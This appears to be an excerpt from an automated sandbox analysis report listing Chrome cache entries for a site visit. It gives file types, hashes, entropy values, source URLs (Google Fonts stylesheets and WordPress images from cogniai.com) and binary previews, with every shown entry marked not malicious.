                                                                                                                Preview:...........MO.0...|..x....s...j..M.G...f..."..w.]..L.z.?..O.'....OeY;.A...].M-.".r....RU.c...iU.J...:..O.B.y...i......\od.\..U).<U..}..U.f..|..r+..u....Tce.......:.....1....}XR.....G.......v....(.P=...~...~uW.Y..6..j....r...K.$.....i.....g .m.u0A..+...cu1....'....#..q..2."G-..X.5;.O..3.A..X....c..W.Z...|N..$"-.Y!x.MN....5.i.'.3..j..o*.......R....>.i4....7bV4c,...........*.y...

                                                                                                                Chrome Cache Entry: 265

                                                                                                                Download File
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:gzip compressed data, max compression, original size modulo 2^32 1218
                                                                                                                Category:downloaded
                                                                                                                Size (bytes):452
                                                                                                                Entropy (8bit):7.405268351326184
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:12:XXhO2yHA3J7G+fOpwlJK7rwjO/MawuC7q7GA+:XRiHA39G7QJK7E6kZ79A+
                                                                                                                MD5:B948FA105BA3E47DBBE496754138A7AA
                                                                                                                SHA1:7FB533CB6B1FA512389F9BD8F6969742BAAA84F2
                                                                                                                SHA-256:BCB0DC8DE7738FF1118FF0DEAA446E289C4CBD5EED382F6225AFDECAF2BE819D
                                                                                                                SHA-512:1C8C7EEC531448E4B51E1F67C757898A3E2AA51074251A06E78B8E5186BB3316BEBC79C2BEE08237CCA8D8BD3972481D22655C54E0D6A07D53AD4F244CA725C6
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                URL:https://fonts.googleapis.com/css2?family=Updock&display=swap
                                                                                                                Preview:...........M..0.........O Y..&1.*..z....jH.6KWU.{.1..K....X.=.;....{...cg:6...q..i;.c...Q./..nN..6}|]0....6..c..f....l......6..q=.9.Ysn.v9.w.kO.........v.Gn.%...|.....n?}.a.q..O..`~.w;.w{...i....2.v.v....w ...H....@.....W.2..A..J*+......VR......... ...b......PV....>c...!......8p.aU.L....e.:.P....<..eJQ.....U..BV*..a."P..W1q.J...?.tP..!.0.3WQ..2GH.\..m.!S:..O..k..\.t....Y..."_ued....o..G.HIY.....4F.n..pQ..TJI.............%....

                                                                                                                Chrome Cache Entry: 266

                                                                                                                Download File
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:gzip compressed data, max compression, original size modulo 2^32 1170
                                                                                                                Category:downloaded
                                                                                                                Size (bytes):445
                                                                                                                Entropy (8bit):7.463428948820462
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:12:XVvPwNWMqc96qgpPNgkStDStGQd43MST0xmS:XJoNWMqcqCDNIxSTOmS
                                                                                                                MD5:9236DACB1881B73B87A1A47FEBEC0DFA
                                                                                                                SHA1:FBC1471591C1F4D8F7DB77D015CF586C72E1DBF1
                                                                                                                SHA-256:A278AB68639C6FC0B05E4E4B5F32CF3D9D1520270A544D0E553BDD2C5E11EA55
                                                                                                                SHA-512:981FE1CD73E914608F07A1BF22987DDEE6E6FCDD110065367D74BB540F0D3B4C427502B264E98E55548C909CAD8BE6D296A9D69AC1606912F312A34D7A8A065A
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                URL:https://fonts.googleapis.com/css2?family=Khand&display=swap
                                                                                                                Preview:............n.0......K...iB.7.;..i..........6......n..I.]o.......]...wp].fb.i.6...d?'..:U.K.....Mo_....S....o...:.........\;<...3..].....:..O..m....n..y.D/..:..^.d.....l..o6..............#N.....*.].;.....?@..!..G...p.mB..4..x.V>.ha...*..C.aM`..2..hLn'.&b.j....?.w.k...J.U..u.i.....t.5..=...{..nB.|..\i.N..r...$.U..q...8@.Y.. h."e4.^.....,V....OW...w..O..$A(\F..Bq..`.'.....S.j..T):^.2...])....5.B..7.A..............-.....

                                                                                                                Chrome Cache Entry: 267

                                                                                                                Download File
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:PNG image data, 602 x 360, 8-bit/color RGBA, non-interlaced
                                                                                                                Category:dropped
                                                                                                                Size (bytes):13434
                                                                                                                Entropy (8bit):7.899317076314346
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:384:QpplzDU5aU/2X2dWim4nzm1wkwTMT8U8GIk7t:Q52aUuX5ifzmuz1U8O7t
                                                                                                                MD5:8845B1778EFF74B1408FC681C46881AA
                                                                                                                SHA1:7E85EAF7744C24324C31F3A19B3415EE335D57A7
                                                                                                                SHA-256:0CA0D9B6FF19E87A4558301C4C1426DCB9A4A71177EF90D5986BE636E92958B1
                                                                                                                SHA-512:6C27C4E4148B45AC9A9E797FE9B2B3B709C449AF62D3264CC2EB719D6F4373B89C787688F1580EC443CB0BA89C8E53F2D8BA97613198BCA5A388DF632C906029
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                Preview:.PNG........IHDR...Z...h.......U.....pHYs...%...%.IR$... .IDATx...u........T ....h\...Lo..R....,?oLU`...*.YA....@.b0.......<...........8y||....}...F.|.\..?..@.4.J....{....3..Tm.]........D...=...$]x|..'*B.~.........\.z.E....A.:.hI...%..d4....C..4..E..h.W.}....h}..{...........H.8..g...T..bu...?H..OEq..."WW..3x..o.....Z.+.9..K,$M.........F..d5...i/..:..../El..T...}0ou.)...n2....wy.\...h.Z.k.8.,.......{...iy.p..M..g...-.s{z.D.g>...{.t#...(..~.......:..+....*.d...3{.|.4U.....^...r=*....H.........4.'e..#W...\I.....N(*......]V..y.|.-...n..f.9.A.i...oHV/....".F...L........J.W..S}11.OE$i5tu....I....=...<.....P.........d.Y.)..c.....K.z.6.d'.N"hknD,p...Fu..iN#...W.!Y....Ol#.C.......\,.Z...4..^Z..d.^?...1.X~..E.-X..X+|r.......|..@ ....7F..2.>.I...|....'&...,F...p.e.s.....n .vL.....mi,m....(&A......h...h8S=.;1.|+.Zv.#...|&..(...V....J..X..&....%.7.+:>...:K..X>,x>.iOJC...........E....x. .......#G..3....l.hM.$.....s,..L...$[....S.e.C.K....-.HO..9...E.

                                                                                                                Chrome Cache Entry: 268

                                                                                                                Download File
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 332x500, components 3
                                                                                                                Category:dropped
                                                                                                                Size (bytes):37203
                                                                                                                Entropy (8bit):6.258573218289485
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:768:LpA1L4Pd4QWZso3i0wW5AoZZzlwY8WTM2LdVsTk/oR3:LSx4PlHUHFlX9Mk/a
                                                                                                                MD5:40810CD34113DCA0F9BBC1EE8B14976E
                                                                                                                SHA1:B014F4B0604554370C8AB4DEB3682BF562AC2D46
                                                                                                                SHA-256:F41683270FBE285376C6D4C1991C9E6CBD4BAFFF4177EFE9813E1AA84AD80EA9
                                                                                                                SHA-512:FB46515BD17F750028DCEFBCEE139BA8DB1BADE865AC6830CACF0A120CC79F8D06871D5AE1B79CDF8A5B3085635364A0D5402D694D7DCAC2FA1DB5A581DEDB51
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                Preview:......JFIF.....H.H....2-http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?>.<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00 ">. <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">. <rdf:Description rdf:about="". xmlns:xmp="http://ns.adobe.com/xap/1.0/">. <xmp:CreatorTool>Adobe Fireworks CS5.1 11.1.0.205 Windows</xmp:CreatorTool>. <xmp:CreateDate>2022-10-16T23:11:06Z</xmp:CreateDate>. <xmp:ModifyDate>2023-09-07T19:52:51Z</xmp:ModifyDate>. </rdf:Description>. <rdf:Description rdf:about="". xmlns:dc="http://purl.org/dc/elements/1.1/">. <dc:format>image/jpeg</dc:format>. </rdf:Description>. </rdf:RDF>.</x:xmpmeta>. .

                                                                                                                Chrome Cache Entry: 269

                                                                                                                Download File
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 1920x1080, components 3
                                                                                                                Category:downloaded
                                                                                                                Size (bytes):129883
                                                                                                                Entropy (8bit):7.343360201226853
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:1536:3+jPDhV0mbuBezRNF0Z8ZQd7C1Ykz4quswFLFlXayY8P2TZs:CV0UuBqRNF0+Z2C1YgqzaLK
                                                                                                                MD5:D5765010EC28300D54CC093C869B1ED9
                                                                                                                SHA1:9373F184DFA63623FB9ED4A2033A26B1B43AA2BA
                                                                                                                SHA-256:B9F0B618DFE9956B1003CB4C29FDEE5B6D27BA80E5E640091241A388932C3274
                                                                                                                SHA-512:25D1CEF2D887FFCE99577FBD173398AA88EB68360377D37E9F923EF986574F6753B02FDF95084D515CE000B7760879ED684832D682B031FE29194B7C1E17059B
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                URL:https://cogniai.com/wp-content/uploads/2023/09/slider-techze-13-1.jpg
                                                                                                                Preview:......JFIF.....H.H....2-http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?>.<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00 ">. <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">. <rdf:Description rdf:about="". xmlns:xmp="http://ns.adobe.com/xap/1.0/">. <xmp:CreatorTool>Adobe Fireworks CS5.1 11.1.0.205 Windows</xmp:CreatorTool>. <xmp:CreateDate>2022-07-25T22:01:58Z</xmp:CreateDate>. <xmp:ModifyDate>2023-09-07T18:39:38Z</xmp:ModifyDate>. </rdf:Description>. <rdf:Description rdf:about="". xmlns:dc="http://purl.org/dc/elements/1.1/">. <dc:format>image/jpeg</dc:format>. </rdf:Description>. </rdf:RDF>.</x:xmpmeta>. .

                                                                                                                Chrome Cache Entry: 270

                                                                                                                Download File
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:gzip compressed data, max compression, original size modulo 2^32 858
                                                                                                                Category:downloaded
                                                                                                                Size (bytes):386
                                                                                                                Entropy (8bit):7.443388441271992
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:6:XtbHJHWRsAzVt8va4ZzJoqDOj+iaUDhkTKDd3iikBlqBI6OhE9zkZk3unCeDS/Kt:X/2RdhtQzjiauhSiIcROE9zkKunC8hD
                                                                                                                MD5:3271300EFECBAFC26361A9C2547510C5
                                                                                                                SHA1:16A4FB5A38CE1966F9241D5DF1AF261EEF9477A5
                                                                                                                SHA-256:7471F3F8076A257434F24E011DB93B95CDECBFA9A18E9AA09E8C5B7DA11CBF2E
                                                                                                                SHA-512:4FFE9F450CA1896E69AEFC89863622B7044B7ACDABA66A34AB8A6515D8B27EB05059D2B8E0E981EADB75F4C083FA7F898810403DF2DEF0D6775C6EF059907F67
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                URL:https://fonts.googleapis.com/css2?family=Yesteryear&display=swap
                                                                                                                Preview:............n.0..w..[.-.$...L.D.P%C... ..#.4EU.6v2V.....c.H......7..`....7.-.,._....U.`....w}.v..mS..C......5......{.X..N.=..*.,......lE..n..RH5Q6........8..r^.....x..W..[......fv.EA&.55.....M.S....1w..).....r...G.$N....k..6...@.....Cs.+.$..u1N..o4l...(0..".d.\.......`..I......'.|........M...!m.Y...&..U.gU...........;..'hi.E.x .d.m./j...o.5..K...........OL.Z...

                                                                                                                Chrome Cache Entry: 271

                                                                                                                Download File
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:gzip compressed data, from Unix, original size modulo 2^32 2859
                                                                                                                Category:downloaded
                                                                                                                Size (bytes):1085
                                                                                                                Entropy (8bit):7.802739799305546
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:24:XvSD7r8XMn49nulMNyHIhSlh73JRnR8zzYB4sh6slKzi5LbC3:XqHwdaMARlh75RR8vg4A6sUzSg
                                                                                                                MD5:10C981E414531FA371A637383E3DDA5D
                                                                                                                SHA1:E2EB307CC499CA898057281A79BEDF5DAE815112
                                                                                                                SHA-256:B67FE501C225E5344329978185446DC4677BA93A75B837A3AB7DB8BCAE8B0746
                                                                                                                SHA-512:2B4B6D525DC5757B56264FA26BBAEC605915F812C75CCCBA4E04C34C6A9FE9F397508CFE16E7A60884517936F49DB28C41487845EBCEC1E8023200CC8D0DBE5A
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                URL:https://cogniai.com/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=5.8
                                                                                                                Preview:...........VQo.6.~....hZT....`C1....{+.>P..!B..I.q....II.b..`...#...>2... .k,..,P.........\...ZU..N....r...r.w......W..."...qi..... 3..UD...b]....@l.|...h'X.H...@.Y...P..hXk.....>g;K1..mK%y!Z.........yJ..$I.c....|HupWBK.|.......<L.....<..E0.(h..[..-.Sv@...;.J.3..;.2......]W..W.!;&..t. RX.)*..u...8e.5Zj....M}..b..C.......>...Y.....*.....S....*..l....M..oK.v.r.4.y.{....m.0.S....o.}...;a........_@".'Pd..d.[-#=...>[....^..YL4...../8.9.....'...s"..Q..R7...:.....W......N{.O"..|.5r>+!H...d$..=...#....}...d...9..o.......H...|.......=...g...8.U().d}...$|b.3;d.. ......Mr.0.S....(..S..Y...P*.<.'j!.G.Z=J..0.P.LG.mJ....{...=..E.6..;...5.6B..|...:...L.3(..Lt....1.j.....b..........A!""'].[..O.}.:.5w...k.4.........p.fM`.^M.=j7....Y.y.,.........$.b.T.6QK....2..f....E.&.^....SM.....vb...v...B/...1.......\....C.c].,ku.0....{....$...@%Y.M..(."..3...=...].=8.VG..F...=.pQ0.;..Di..3FW7........!..x....Sw..@..A..a.[.W.7........i:..l.@)..`@g.T.{Z.S.h%.N;9.&...

                                                                                                                Chrome Cache Entry: 272

                                                                                                                Download File
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 332x500, components 3
                                                                                                                Category:downloaded
                                                                                                                Size (bytes):41202
                                                                                                                Entropy (8bit):6.4911939113538075
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:768:UA3XxSzTfFIwI0zG4+GnSNRPFDUil5GNGVOIGDUI5Mw:UAxSzT9IWztRnCRPF4KGsVOIGDUfw
                                                                                                                MD5:A81D8E93F633DC9AAA5526EBF389A262
                                                                                                                SHA1:8FA0EA38E77F837737E40E359485B02539AC5FDE
                                                                                                                SHA-256:016A0826863E120B8F689898AB845E98F4DA9CC1590D30041D31214713EAD111
                                                                                                                SHA-512:D08CA903EC089C625EAD528E6389D66AF7D7EF34A38722F5BBBAC18BD5342240FE38F9960C96D703F3657FEA348FFE58C4F499FDDE8F9364F104BB5E3F6FA4F6
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                URL:https://cogniai.com/wp-content/uploads/2022/12/small-project-4.jpg
                                                                                                                Preview:......JFIF.....H.H....2-http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?>.<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00 ">. <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">. <rdf:Description rdf:about="". xmlns:xmp="http://ns.adobe.com/xap/1.0/">. <xmp:CreatorTool>Adobe Fireworks CS5.1 11.1.0.205 Windows</xmp:CreatorTool>. <xmp:CreateDate>2022-10-16T23:11:06Z</xmp:CreateDate>. <xmp:ModifyDate>2022-12-14T02:09:48Z</xmp:ModifyDate>. </rdf:Description>. <rdf:Description rdf:about="". xmlns:dc="http://purl.org/dc/elements/1.1/">. <dc:format>image/jpeg</dc:format>. </rdf:Description>. </rdf:RDF>.</x:xmpmeta>. .

                                                                                                                Chrome Cache Entry: 273

                                                                                                                Download File
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:gzip compressed data, max compression, original size modulo 2^32 853
                                                                                                                Category:downloaded
                                                                                                                Size (bytes):393
                                                                                                                Entropy (8bit):7.351792959730869
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:12:Xvj+BWnhR88z0jR2zS5GdbepjOzvH6c/AyT6J+:XreOhRDz04e0dbm4HL/J4+
                                                                                                                MD5:9A680DEB48395B49329A595D2FCE30FD
                                                                                                                SHA1:97BC8941982E186D9D6FE6B1D90115547E86E84C
                                                                                                                SHA-256:B3A6AA8BE423F37215CCD063B92458E1CA7218E7684142B19C9D3959F2DE0906
                                                                                                                SHA-512:254F08A4620E765E563B88216A7CA218515D18EBBF41340DBF69E9F4716879BED8A2344334A51A5A9B12587D2E5A0EC85AC5B77993BBE2BBF17C5BB3E4849108
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                URL:https://fonts.googleapis.com/css2?family=Sora&display=swap
                                                                                                                Preview:...........MO.0......./.....D..D.=.elca/.......Z8.x...~O.>m...".ye'G...I.J.i.'....P..'.tVu.uf.2..".@U7eT\..$.6..C...u.wE$'.C.SU....7Ew#.{..6>..o..q]B....~b.....=co..y....;.|.U..W.U...by..d.C...'o....N....n_.q.N.&.2..+......k.$.....U...K......k.AC...d..S9..m.s...F$......G.\..TB.w0v...#t.c.K...o..s....by.'eH)C..c....[....(.gucc.H..o..O....C-...SlRK..&.....1..........Qc#.U...

                                                                                                                Chrome Cache Entry: 274

                                                                                                                Download File
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:gzip compressed data, max compression, original size modulo 2^32 1440
                                                                                                                Category:downloaded
                                                                                                                Size (bytes):472
                                                                                                                Entropy (8bit):7.53737664943783
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:12:XbMrLLufetFQl0AuVG4M5RPYy1ZMLqjogHUaIm0cp8:Xbc3jFxAF5RANXgHbb0u8
                                                                                                                MD5:CED4F616809772AB1309C583DFCC30BB
                                                                                                                SHA1:F3CDFB8ED2842B4B3924EE3A500DB1FA440729AE
                                                                                                                SHA-256:3006F738EC0A2CFD1770F942D8ECBF9FEE6A6BB72316F83154966CEB94BD2632
                                                                                                                SHA-512:709DEBB17F708AC88C80EF806161BBC2159C33DC7E4E044376FBF528D5315493CE8811919F499F45AC69FD07A6626FA093286352A5C5A530D49B6503561D7A24
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                URL:https://fonts.googleapis.com/css2?family=PT+Sans&display=swap
                                                                                                                Preview:............n.0.E.....5....M%Q."..G...,;*d....N......^z..!)rp.......GMn....8h..........SF._..zP.....O}..a..u.1{h...H..1......u.wfVMMF.S....NeA`...F.Zw.....vZ.}..0.~v......=...S..V....a\..5.=.....b?t.j.T......D.P...E..;.8..........;.$..'..XEq.....p.&Z}.hK.o.x..E.t..p.R.(,.0L.D=65\`.N.k..mXa..U ...25Pz..D.@.m.j(r.....<8..Kle...$Cp.3`.j... .J.,m-..`O..)..R.k...P...e.......]..Q.....nY.......1s<....N|.\...pg.......kKJ).%..........9:....

                                                                                                                Chrome Cache Entry: 275

                                                                                                                Download File
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, comment: "CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 82", baseline, precision 8, 2560x1435, components 3
                                                                                                                Category:dropped
                                                                                                                Size (bytes):262236
                                                                                                                Entropy (8bit):7.920695031240109
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:6144:gmW7UWnW0zuC7JW7yFNtBMIDURghP7XI3diminGJItUu/aeWjxnm7:g1nW3khBhDph7YN1iKHu/qM
                                                                                                                MD5:9D08E5E97EE0CF737F881F9D19C714A9
                                                                                                                SHA1:384A1E9BEF799B3B88FCD0A4FD2986A4599161C9
                                                                                                                SHA-256:3E9BF0CCA1223157249EB6DE278422139AEEF2EB68464C19CCF63C678694AC0E
                                                                                                                SHA-512:7798F4F0EE541BB46FD347E544D203B5548E1C6CC02860D5F6EC43B9DB9305A141FF5CAE95EDDCAFBDC89A8DBAC3C87DBC99D56B194105E4952FC4E8930C66E1
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                Preview:......JFIF.....`.`.....;CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 82....C.....................................!........'.."#%%%..),($+!$%$...C...........$...$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..{.KIK]fBR.R..E%-0.(...(.....(...(...(...(...(...(...(.......Q@...c.(..R.@...E..(...(...%-..(...(....Q.(.(........f.4RP!i(....>.Ph....Gj.2h..P.M..GJ................J)i;..E-%..R.@.%-......P.R.))h.w..Q...)h....4b...i)h...)@.4....Q.E.AE....bR.(...M...E......+..:..isM4.L.QF1E30.....qAp.\QF8.....:.@.....XRc.V.F8.7..

                                                                                                                Chrome Cache Entry: 276

                                                                                                                Download File
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:gzip compressed data, max compression, original size modulo 2^32 1391
                                                                                                                Category:downloaded
                                                                                                                Size (bytes):498
                                                                                                                Entropy (8bit):7.570049712240217
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:12:XvhZU0klnPK7tM1Z9HHkwkK8ZW8+YuHI3Jr7Gm2qsGr+Sl:XJSlPK7tMJbJ8ZT8o5r7G5qsM+Sl
                                                                                                                MD5:A8071AD90B83C637D324DD7F4772DA9E
                                                                                                                SHA1:E718B5F646F62BAF7BE5A9F3E9A9931B2193017E
                                                                                                                SHA-256:8BEF32B979629D22D984134D274ACA7FC4415435B38011548C1022B91BCC4954
                                                                                                                SHA-512:EE6FEC2319EDA140BD2706028776BE532A30AF8EA975847B5D508D4D2B07038FC63522D55A186597F63DF6DE1154231C28E84B0558C238E8CCA73D92BFF6FD3B
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                URL:https://fonts.googleapis.com/css2?family=Anek+Gurmukhi&display=swap
                                                                                                                Preview:............o.0......L.l!.!N.^.8d.....rC......i..^.P.4..^..c.vl=o..Z...n.*...}\4...2/..B.6eu.Q....}r....z..U...i7.z....r.b4..Ee[.|.#....y.m+....r.g.6...NVJm...uY7\vJ.2.....|..9...$../............].}.?......2J7.hV1...'.y.]N...@.*.fx..p.,.....OQ'}..S}.]]...ZY/.?..( ....6.`...a..L..Xx0....d .IFM...`..{.{..U...+...Vr#_....a.pc.&)..J..5....4...,30.c.g6..ER8...)"....AF..v.)..18..@..BF&.....m<.`?......l._..k..)$#b3...#...n..~..FI...S}<..)...%...K+..\...\kdY.j.........n.PQo...

                                                                                                                Chrome Cache Entry: 277

                                                                                                                Download File
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:gzip compressed data, max compression, original size modulo 2^32 866
                                                                                                                Category:downloaded
                                                                                                                Size (bytes):395
                                                                                                                Entropy (8bit):7.393723876015646
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:6:Xtwcrj6e910KqqUp0f42VTrsaPwhk4j0/1YF2PKgo6tAzHAykdna8mt35IHgg/8e:XRRJY/kxPwS4j0tYEPasH3mtpIV8GsW
                                                                                                                MD5:A0941D2A77436FE3F2295B407E9123E5
                                                                                                                SHA1:6592569165751C659AEF7E0BE304233BE98BE71F
                                                                                                                SHA-256:A87B53BCE58C0192764CBDA55A24B4A084705F41B7D2A7F00085CC63CA3CB140
                                                                                                                SHA-512:2D5D3B2C4CF9CD8557E5C8FA9DE2A290B1AD243348C8E44CD57A9A4484483CEFC29C0C6074D2A7D6F97BC234CC5F351522621BC187F3BBC251A7F0689EEB6335
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                URL:https://fonts.googleapis.com/css2?family=Outfit&display=swap
                                                                                                                Preview:...........MO.0.......MY_.c..P.....=.d.ax.Pd...mi...G/....i.$..1.#..f..`...iUr3...|...Td...F..4.....C.8...".O...6[....Sm.5.<.w4]........p...q .m.d.p1M<...6............c.%.[k..^...{.T....8.2...j.UiJF.U1...=.#.d[fq.N.:*7b.3..2...s......jK........m..0E....d!...b.{}..$.....P.."H..L.x.|.T.`<..E...c.M...-......ow...?.C.........S,S..n...Z.v.....y=Asm...!*.X.r#6t...i..1_.........b...b...

                                                                                                                Chrome Cache Entry: 278

                                                                                                                Download File
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 332x500, components 3
                                                                                                                Category:downloaded
                                                                                                                Size (bytes):37636
                                                                                                                Entropy (8bit):6.24485815068222
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:384:LgxhmaaFwgHGH9+oWJluH57Vvj7EOdyKYWejyAAV9hjheS4CjF1eqpy4tbR1vkYF:kxAHkGJl+Vr7EOgKIjM9efutdly8
                                                                                                                MD5:4786048971647FE98161E436E9500FCE
                                                                                                                SHA1:85F27BFA852CC8EBCB9DF1CEF93A5AF829C16DA4
                                                                                                                SHA-256:C7DAA8A33DD69095C389440D91F44DB15BF9B2073CCFAF9BE0323BBDADF46F61
                                                                                                                SHA-512:1947888F79E54837F17D129AF431C63216C0F8B7FF022F9444E18182305851D1A8E8A7D003BA61513641A57B3EC84539F513C838680CBC81E976FE5FABF2C4AF
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                URL:https://cogniai.com/wp-content/uploads/2022/12/small-project-5.jpg
                                                                                                                Preview:......JFIF.....H.H....2-http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?>.<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00 ">. <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">. <rdf:Description rdf:about="". xmlns:xmp="http://ns.adobe.com/xap/1.0/">. <xmp:CreatorTool>Adobe Fireworks CS5.1 11.1.0.205 Windows</xmp:CreatorTool>. <xmp:CreateDate>2022-10-16T23:11:06Z</xmp:CreateDate>. <xmp:ModifyDate>2022-12-14T02:52:04Z</xmp:ModifyDate>. </rdf:Description>. <rdf:Description rdf:about="". xmlns:dc="http://purl.org/dc/elements/1.1/">. <dc:format>image/jpeg</dc:format>. </rdf:Description>. </rdf:RDF>.</x:xmpmeta>. .

                                                                                                                Chrome Cache Entry: 279

                                                                                                                Download File
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:gzip compressed data, max compression, original size modulo 2^32 1293
                                                                                                                Category:downloaded
                                                                                                                Size (bytes):475
                                                                                                                Entropy (8bit):7.52827093434768
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:12:X/8uzMOEM20xrhyZbYT74OySFinYC771Khs0kMj3n:X0udEMRrhWbYoOy7nYCf1KhfkMj3
                                                                                                                MD5:0D25DDDF04ED138411E260B06BFBDBB3
                                                                                                                SHA1:723677AD80935F93573059DBEADFE41D4E36AD72
                                                                                                                SHA-256:733E910F2E5D92915B02AF64FA2022556C70DBCB22A08BF7FFDE20CB0B5E3EA0
                                                                                                                SHA-512:5DF850022A2CE68FFA8BEDE90EB43A8E0FA2A9B15C06D4AF1C378B799321E6706D5DFF41AAE342059ADDB2EDE970CFB88810D632B737B52B43B6141BC7BEEAAA
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                URL:https://fonts.googleapis.com/css2?family=Faustina&display=swap
                                                                                                                Preview:...........KO.@.....{..:.pb'......*H...m..,9....h..g.C.^*.G..};...|.x...JwrS..M...;.....B@..}I.X..M'..)._.*A]..........N....C..V..j/....e.v...Q.A%..25]+-uSN.~...aG...^}..]._=......\.n.~.a...p{.u_...`u.P.}_...lm.......v.]..C.le.6G.vB(a.....Pb.R.la.-=D.".n.8.qa %.Bb2!.......o....cZ..........u.'.5...Y..9...q...a.47..=d....0...r[&.L.0.?....4O....b. .U!..F@......@.3.:.,.LE...x.H.c!~.................7.Ajj..{.@!...Yd.=#...7..K...2.....p,...7.......4.......

                                                                                                                Chrome Cache Entry: 280

                                                                                                                Download File
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:gzip compressed data, from Unix, original size modulo 2^32 160787
                                                                                                                Category:downloaded
                                                                                                                Size (bytes):32415
                                                                                                                Entropy (8bit):7.988189388790525
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:768:SNKTH56lAcka509ErGfF6jIO4pcImdOr4b:SQNhR90G4ENuIVr4b
                                                                                                                MD5:0D81FB7B141C9BC0E41BDA6944D3D72B
                                                                                                                SHA1:7B06E310E3DF16D8D99A0A7D046A14F57687EFAF
                                                                                                                SHA-256:65F569FF1174875116D54566CA8324B71459EE12F84CFF5C9E1EFFC33793FD06
